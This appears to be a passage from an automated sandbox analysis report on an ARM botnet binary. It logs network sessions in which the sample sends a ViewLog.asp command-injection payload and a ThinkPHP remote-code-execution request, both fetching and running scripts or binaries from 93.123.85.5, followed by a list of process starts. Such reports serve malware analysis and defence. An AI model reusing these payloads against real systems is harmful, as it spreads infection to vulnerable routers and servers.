                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.792395115 CET20046OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:49.727207899 CET20673OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:05.597203970 CET20700OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              987192.168.2.2342564112.124.1.9880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.616964102 CET19148OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:34.957673073 CET19250INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:34 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              988192.168.2.233581694.187.117.738080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.627521992 CET19149OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              989192.168.2.236034294.122.225.318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.642117977 CET19150OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              99192.168.2.233669894.120.228.1978080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.150140047 CET3061OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              990192.168.2.2336350112.197.133.15680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.894006968 CET19249OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:35.286835909 CET19270INHTTP/1.0 400 Bad Request
                                                              Date: Tue, 14 Nov 2023 04:20:34 GMT
                                                              Server: Boa/0.94.14rc21
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Content-Type: text/html; charset=ISO-8859-1
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              991192.168.2.234462288.133.201.12580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:35.605573893 CET19275OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:35.935442924 CET19302INHTTP/1.1 400 Bad Request
                                                              Server: openresty
                                                              Date: Mon, 13 Nov 2023 21:20:35 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 154
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              992192.168.2.235115888.169.162.22380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.244185925 CET19499OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:37.599992037 CET19513INHTTP/1.1 403 Forbidden
                                                              Nov 13, 2023 22:20:37.600389957 CET19514INData Raw: 53 65 72 76 65 72 3a 20 61 6c 70 68 61 70 64 2f 32 2e 31 2e 38 0d 0a 44 61 74 65 3a 20 4d 6f 6e 20 4e 6f 76 20 31 33 20 32 32 3a 32 30 3a 33 37 20 32 30 32 33 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e
                                                              Data Ascii: Server: alphapd/2.1.8Date: Mon Nov 13 22:20:37 2023Pragma: no-cacheCache-Control: no-cacheContent-type: text/htmlContent-length: 62<html><body><h1>The request is forbidden.</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              993192.168.2.233664085.122.223.648080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.247972012 CET19499OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              994192.168.2.234903088.88.37.12080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.264341116 CET19500OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:37.589195013 CET19513INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:37 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              995192.168.2.233893888.31.90.8780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.340341091 CET19504OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:37.748262882 CET19589INHTTP/1.1 404 Site or Page Not Found
                                                              Nov 13, 2023 22:20:37.748279095 CET19590INData Raw: 53 65 72 76 65 72 3a 20 65 57 4f 4e 0d 0a 44 61 74 65 3a 20 4d 6f 6e 20 4e 6f 76 20 31 33 20 32 31 3a 32 30 3a 33 36 20 32 30 32 33 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61
                                                              Data Ascii: Server: eWONDate: Mon Nov 13 21:20:36 2023 GMTConnection: closePragma: no-cacheCache-Control: no-cache,max-age=0,must-revalidateContent-Type: text/html<!DOCTYPE html><html><head><meta charset="ISO-8859-1"/><title>Document Error:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              996192.168.2.235067231.136.60.178080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.351676941 CET19506OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:40.512393951 CET19890OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:46.655622005 CET20531OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:58.686283112 CET20694OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:23.002927065 CET20713OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              997192.168.2.235206694.122.9.258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.365565062 CET19507OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              998192.168.2.235218894.121.145.1858080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.370043039 CET19508OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              999192.168.2.233405294.122.110.1848080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:37.370232105 CET19508OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              System Behavior

                                                              Start time (UTC):21:17:56
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:/tmp/mods.arm7.elf
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):21:17:56
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):21:17:56
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):21:17:56
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):21:17:56
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                                              Start time (UTC):21:17:56
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                                              Start time (UTC):21:17:57
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                                              Start time (UTC):21:17:57
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):21:17:57
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):21:17:57
                                                              Start date (UTC):13/11/2023
                                                              Path:/tmp/mods.arm7.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1